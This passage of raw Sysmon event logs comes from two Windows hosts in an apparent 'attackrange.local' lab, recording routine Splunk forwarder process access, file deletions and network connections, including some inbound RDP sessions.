m32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.593{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.593{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8DD4-6151-BE00-00000000FD01}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.593{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8DD4-6151-BE00-00000000FD01}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.594{5EBD8912-8DD4-6151-BE00-00000000FD01}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.140{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F45C1EFF4E9B4CEA88CEAFAEAE766C3A,SHA256=4D8476AF63C916A734AD00E759BA26014C4BCF575BFD6E8E19508CF3D051B36E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:37.734{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8136FBAF9412865914A1A2C939958D2,SHA256=9C61ACCE96FA16082446ADA1611FD0DA13D899D12E45E76DDCD66BCB1DDC647E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981478Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:34.704{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59550-false10.0.1.12-8000- 354300x8000000000000000981477Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:34.667{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse110.10.193.201-63468-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000981476Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8DD5-6151-217A-00000000FD01}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981475Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981474Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981473Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981472Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981471Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981470Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981469Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981468Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981467Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981466Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.441{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8DD5-6151-217A-00000000FD01}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981465Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.426{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8DD5-6151-217A-00000000FD01}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981464Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.427{69CF5F33-8DD5-6151-217A-00000000FD01}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981463Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:37.082{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45D678119EEAC73E4D29860FA78770BB,SHA256=84D3A99C060BB0AC867DA30C2CC824B1E668E534CF05B7A64462FC0B6FF09726,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:37.593{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24EBB2384FA71B91506E2DEF8841C4B5,SHA256=14612DBB5DFCDCBB4CEE663EE6DE80DBFD0ECE8E495B299BD27DF054D780F2A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:35.714{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55003-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:38.750{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6934D2F60AC0974BCBCF4F5190FB0CD,SHA256=6EA53BECD2183F76B6D80D55F36378C9491AC57F0DE8FB16A32D968E34407EEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981480Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:38.645{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=61AEB29F36D9E37BCBF0845C8BF7BB83,SHA256=368B0FB25AD775C98F440D31C58A3AAB1124CD2BBC1A1DD4B9A30FCDF22A5DF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981479Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:38.207{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FFE5E0A21AF9EB530C434FD5666484F,SHA256=52DF9C9C8B1891A9F3CEA049AE11538C9E64F4429BD63C251FBFDBECA7A67A4F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.069{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54250-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:39.750{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A48CEFD248F39322F71DFD11C9A2F9F,SHA256=C221F0D0FAC19F3879B0763CA01D108C14FF80946B083EC4C983711FA311F85D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981481Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:39.270{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCAFA4235D966265D0BEFF26AD4B275D,SHA256=9FE8BEEC85C1F4644E92F2364E54F6CD5A5623C4FF601C5FBED29936659CE864,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056964Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:40.812{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78C53923E5C2DF3706CE686F1072D122,SHA256=9AE465E489061B0881DE7346E350420686A4CDE3539F5E9EEBA8E872A489A90D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981483Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:40.832{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=331C6CF6CADFEE76D4B03145E88A1264,SHA256=AB440FCF5DE3D91E560D799E5D698C24CB63FFAF2A0CAC5A9A65C03E5109C82C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981482Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:40.316{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=805BAC875E1E2470CC462183A629A656,SHA256=18391C8FAA3D4F8920A46944122DC15B91044FBE6E603D59EEE1BC6BE44EE5BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056965Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:41.890{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=638847346E3E2FB3BBF6E78A92A9DAD3,SHA256=85CC5338712AF4F359C639B69857D5EBA9C9B92672324CAE91CA8FD6CECB8FD2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981486Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:38.139{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59872-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981485Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:38.020{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57106-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981484Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:41.473{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E54A460460EB2A2442C0FC42C62A064,SHA256=2D4D704CB55312E6B19CE6EB0CE4B82DD5E8F3AF0E4699DDFA7BFBFCD1140FFA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981489Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:39.876{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program 